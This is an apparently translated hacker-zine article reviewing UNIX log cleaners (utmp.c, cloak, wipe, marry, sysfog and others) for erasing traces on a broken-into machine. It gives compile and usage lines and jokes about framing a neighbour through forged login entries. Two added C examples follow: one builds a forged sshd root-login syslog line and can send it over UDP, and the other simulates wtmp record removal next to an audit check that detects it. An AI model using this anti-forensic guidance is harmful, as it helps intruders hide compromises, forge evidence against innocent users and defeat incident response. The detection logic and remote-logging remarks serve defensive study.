Hacking
LOG CLEANERS FOR UNIX
Stalsen (stalsen@mail.ru) http://stalsen.dtn.ru

Log cleaners for UNIX
How not to leave traces on a hacked box
UNIX has had logging since the day it was born: there had to be a mechanism that told the administrator what had happened on the machine, including the events that matter for security :).
So, the box is hacked, the backdoors/rootkits are installed, and it is time for the third step of the break-in: cleaning the logs. In my view this is the most critical step, because what is at stake is your backside, aka your freedom. So let's now pick a suitable log cleaner...
utmp.c and logwedit.c
The who command on *nix shows who is logged in right now, and that information comes from exactly one place: utmp. These two fine programs delete utmp entries. Note that utmp only covers current sessions; the login history that last(1) reads lives in wtmp, which these two do not touch. Standard compilation.
Usage: utmp <...> or <...>.
stealth.c
Hides you from who/rwho and finger. The latter two services are rarely running anywhere, and where they are, I would question the admin's qualifications :).
mme.c
This program also modifies utmp, but not the way you think. MakeME lets you substitute another login's entries for the original ones. Now you can do the hacking while your neighbour does the court appearances :). Standard compilation.
Usage: mme <...> or mme <...>.
lastlog.c
Modifies lastlog on systems such as Ultrix and SunOS, which are nearly exotic these days, but it may still come in handy for someone...
invisible.c
Modifies lastlog, utmp and wtmp, i.e. what the lastlog, who and last commands report. The program takes no options at all. Standard compilation.
cloak.c
Written by Michael S. Baldwin. Cleans the utmp, wtmp, lastlog and acct files (the paths to them can be changed, as in every program presented here). Standard compilation (gcc cloak.c or gcc cloak.c -o cloak).
Usage: cloak <...>
-l - login time
-u - username
-h - host
-p - program
remove.c
The author calls it a universal utmp/wtmp/lastlog cleaner. And so it is :).
Compilation:
gcc -o remove remove.c -DGENERIC
Usage: remove <...>.
At the -> prompt:
# - remove the last # entries from utmp/wtmp
a - remove all entries from utmp/wtmp
q - quit
lastlog is modified automatically as well.
sysfog.c
A program that sends forged entries to syslog. Standard compilation.
Usage: sysfog <...>
The message codes (the syslog level, which syslogd combines with a facility) are:
LOG_EMERG 0
LOG_ALERT 1
LOG_CRIT 2
LOG_ERR 3
LOG_WARNING 4
LOG_NOTICE 5
LOG_INFO 6
LOG_DEBUG 7.
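What a tool like sysfog actually has to produce is a syslog line whose <PRI> prefix encodes one of the levels above together with a facility. The example below is added here and is not sysfog.c (the article does not show its source): it builds such a line, decodes the prefix back into facility and level, and can ship it as the UDP datagram a loghost would receive. The sshd tag, PID, address and message text are constructed, and nothing is sent unless main() is given a host name on the command line.

```c
/* Added example: not sysfog.c (the article does not show its source) but
 * what such a tool has to produce: a BSD-style syslog line and its <PRI>
 * prefix, the one number syslogd turns back into facility and level. The
 * tag, PID, address and message are constructed. Nothing is sent unless
 * main() is given a loghost on the command line. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L   /* getaddrinfo() under a strict -std */
#endif
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <syslog.h>
#include <unistd.h>

/* "<PRI>tag[pid]: message". PRI = facility*8 + level; the LOG_AUTH style
 * facility constants in <syslog.h> are already shifted left by 3, so the
 * OR below is exactly that arithmetic. Returns the line length. */
static int build_syslog_line(char *out, size_t outsz, int facility, int level,
                             const char *tag, int pid, const char *msg)
{
    return snprintf(out, outsz, "<%d>%s[%d]: %s", facility | level, tag, pid, msg);
}

/* Decode the <PRI> prefix. Returns the PRI number, or -1 unless the line
 * starts with a well-formed "<0..191>". */
static int pri_of(const char *line)
{
    int pri, used = 0;
    if (line[0] != '<' || sscanf(line, "<%d>%n", &pri, &used) != 1 || used == 0)
        return -1;
    return (pri < 0 || pri > 191) ? -1 : pri;
}

static int level_of(const char *line)    /* 0..7, the table above */
{
    int p = pri_of(line);
    return p < 0 ? -1 : LOG_PRI(p);      /* low three bits */
}

static int facility_of(const char *line) /* facility number, e.g. 4 = auth */
{
    int p = pri_of(line);
    return p < 0 ? -1 : LOG_FAC(p);      /* upper bits, shifted back down */
}

/* What a forger feeds to syslogd: an "accepted login" attributed to sshd
 * with an invented PID. syslogd writes it as received; nothing in the
 * protocol authenticates the tag, the PID, or (over UDP) the source host. */
static const char *forged_line(void)
{
    static char buf[256];
    build_syslog_line(buf, sizeof buf, LOG_AUTH, LOG_INFO, "sshd", 4242,
                      "Accepted password for root from 10.0.0.1");
    return buf;
}

/* Ship the line as one UDP datagram to port 514: the wire form of a
 * syslog.conf rule such as "*.*  @loghost". Returns bytes sent or -1. */
static int send_to_loghost(const char *host, const char *line)
{
    struct addrinfo hints, *res;
    int fd, n = -1;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_DGRAM;
    if (getaddrinfo(host, "514", &hints, &res) != 0) return -1;
    fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd >= 0) {
        n = (int)sendto(fd, line, strlen(line), 0, res->ai_addr, res->ai_addrlen);
        close(fd);
    }
    freeaddrinfo(res);
    return n;
}

int main(int argc, char **argv)
{
    const char *line = forged_line();
    printf("%s\nfacility %d, level %d\n", line, facility_of(line), level_of(line));
    if (argc > 1)
        printf("sent %d bytes to %s:514\n", send_to_loghost(argv[1], line), argv[1]);
    return 0;
}
```

Run it without arguments to see the line and its decoded priority; with a host name it sends the datagram. The same bytes written to /dev/log are what the local syslogd files under the auth facility, which is why a receiving side that wants any confidence in its logs has to rely on something other than the message contents.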
Wipe
Wipe is a tool for deleting entries from utmp/wtmp, lastlog and acct. Special attention in this program goes to portability across platforms and to minimising the library mismatches between different systems and versions.
Install: make or gcc -o wipe wipe.c
Usage: wipe [u|w|l|a] options
(u - utmp, w - wtmp, l - lastlog, a - acct).
UTMP editing:
Erase all user names: wipe u <...>
Erase one user name on the chosen tty: wipe u <...>
WTMP editing:
Erase a user's last login: wipe w <...>
Erase the last login on a tty: wipe w <...>
LASTLOG editing:
Clear lastlog for a user: wipe l <...>
Overwrite lastlog with another user: wipe l <...>
where the time argument is given in the format [YYMMddhhmm].
marry.c
A fairly powerful log cleaner with many options. Erases entries in wtmp/utmp, lastlog and acct/pacct. Standard compilation.
Usage: ./marry [-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat] [-v pat] [-m [WLA]] [-E editor] [-h program] [-b backup]
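All of the utmp/wtmp editors above (utmp.c, cloak, remove, wipe, marry) work on the same thing: a file that is simply an array of struct utmp records. The example below is added here and is not the source of any of those tools. It builds a constructed five-record wtmp in memory, applies the two editing styles the tools use (zeroing a record in place, as cloak does, and dropping it and compacting the file, as wipe does), and then runs the check a reviewer would run on the result. The user names, hosts and timestamps are made up; nothing under /var/log is touched.

```c
/* Added example: not the source of any cleaner named in this article, but
 * what the utmp/wtmp editors (utmp.c, cloak, remove, wipe, marry) do to the
 * record file, next to the check a reviewer can run on the result.
 * utmp/wtmp are arrays of struct utmp (glibc/musl <utmp.h>). The records
 * below are constructed; nothing under /var/log is read or written. The
 * struct layout differs between platforms, which is the portability
 * problem Wipe's author was fighting. */
#include <stdio.h>
#include <string.h>
#include <utmp.h>

#define NREC 5

/* Constructed history: root in and out on tty1, "stalsen" in and out on
 * pts/0, alice still logged in on pts/1. Logout records carry no user. */
static int sample_wtmp(struct utmp *r, int max)
{
    static const struct { short type; const char *user, *line, *host; long t; }
    rows[NREC] = {
        { USER_PROCESS, "root",    "tty1",  "",             1000000000L },
        { USER_PROCESS, "stalsen", "pts/0", "evil.example", 1000000100L },
        { DEAD_PROCESS, "",        "tty1",  "",             1000000200L },
        { USER_PROCESS, "alice",   "pts/1", "lan.example",  1000000300L },
        { DEAD_PROCESS, "",        "pts/0", "",             1000000400L },
    };
    if (max < NREC) return 0;
    memset(r, 0, sizeof(*r) * NREC);
    for (int i = 0; i < NREC; i++) {
        r[i].ut_type = rows[i].type;
        r[i].ut_pid  = 100 + i;
        strncpy(r[i].ut_user, rows[i].user, sizeof(r[i].ut_user) - 1);
        strncpy(r[i].ut_line, rows[i].line, sizeof(r[i].ut_line) - 1);
        strncpy(r[i].ut_host, rows[i].host, sizeof(r[i].ut_host) - 1);
        r[i].ut_tv.tv_sec = rows[i].t;
    }
    return NREC;
}

/* cloak style: zero the matching records in place. last(1) skips the hole,
 * but a zeroed slot in the middle of the file is obvious on inspection. */
static int zero_user(struct utmp *r, int n, const char *user)
{
    int hit = 0;
    for (int i = 0; i < n; i++)
        if (strncmp(r[i].ut_user, user, sizeof(r[i].ut_user)) == 0) {
            memset(&r[i], 0, sizeof(r[i]));
            hit++;
        }
    return hit;
}

/* wipe style: drop the records and compact; returns the new count. The
 * file shrinks cleanly, but the logout record for the session survives,
 * because logout entries do not carry the user name. */
static int remove_user(struct utmp *r, int n, const char *user)
{
    int kept = 0;
    for (int i = 0; i < n; i++)
        if (strncmp(r[i].ut_user, user, sizeof(r[i].ut_user)) != 0)
            r[kept++] = r[i];
    return kept;
}

/* Reviewer's check: count zeroed records inside the file, and DEAD_PROCESS
 * records on a line that had no preceding USER_PROCESS. */
static int suspicious_records(const struct utmp *r, int n)
{
    int bad = 0, nopen = 0;
    char open_line[NREC][sizeof(r[0].ut_line)];  /* lines currently logged in */
    for (int i = 0; i < n; i++) {
        int j;
        if (r[i].ut_type == EMPTY) { bad++; continue; }   /* cloak-style hole */
        for (j = 0; j < nopen; j++)
            if (strncmp(open_line[j], r[i].ut_line, sizeof(r[0].ut_line)) == 0)
                break;
        if (r[i].ut_type == USER_PROCESS) {
            if (j == nopen && nopen < NREC)
                memcpy(open_line[nopen++], r[i].ut_line, sizeof(r[0].ut_line));
        } else if (r[i].ut_type == DEAD_PROCESS) {
            if (j == nopen) bad++;               /* logout without a login */
            else memmove(open_line[j], open_line[--nopen], sizeof(r[0].ut_line));
        }
    }
    return bad;
}

/* Driver: one cleaner style applied to the sample, then audited.
 * style 0 = untouched, 1 = cloak style, 2 = wipe style. */
static int audit_after(int style)
{
    struct utmp r[NREC];
    int n = sample_wtmp(r, NREC);
    if (style == 1) zero_user(r, n, "stalsen");
    if (style == 2) n = remove_user(r, n, "stalsen");
    return suspicious_records(r, n);
}

int main(void)
{
    printf("untouched %d, cloak style %d, wipe style %d suspicious record(s)\n",
           audit_after(0), audit_after(1), audit_after(2));
    return 0;
}
```

The point of the audit function is that both styles leave a footprint: zeroing leaves an EMPTY record between live ones, and removal leaves a logout for a session that never logged in, because login records name the user but logout records only name the tty. A reviewer walking a real wtmp with the same logic (plus a timestamp monotonicity check) sees both without needing a copy from before the cleaning.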
P.S. I should also say that many rootkits ship with log cleaners of their own.
But all of this is powerless...
As you have gathered, log cleaners erase the various wtmp/utmp and lastlog files and sometimes acct/pacct. But what do you do if the system is run not by a clueless admin but by a genuinely good one? What if he has installed additional loggers that are not part of the standard UNIX distribution and come from third parties, such as SWATCH, Netlog, LogSurfer and so on? Obviously nobody is going to write log cleaners for all of those. And what if the logs are also forwarded to another host and copied automatically, say, to a tape streamer? Granted, I may be exaggerating, but it is possible!
Even plain syslog can ship its data to a remote node: in syslog.conf you put @hostname in place of the file name (for example, replace /var/log/messages with @loghost; note that utmp and wtmp are not syslog files and cannot be forwarded this way), and on the remote machine run syslogd so that it accepts messages from the network on UDP port 514. And I am not even talking about tools like MOM and the like!
And what if the admin has moved the logs? syslog.conf decides where syslogd writes its files, while the utmp/wtmp/lastlog paths are compiled into login, init and friends, so if any of them live somewhere non-standard you will have to edit the log cleaner's source...
I suggest you think about these rhetorical questions :). It all depends only on your skill. Besides, cleaning the logs is not the only problem on a hacked workstation...
< Hacking > 20/02\02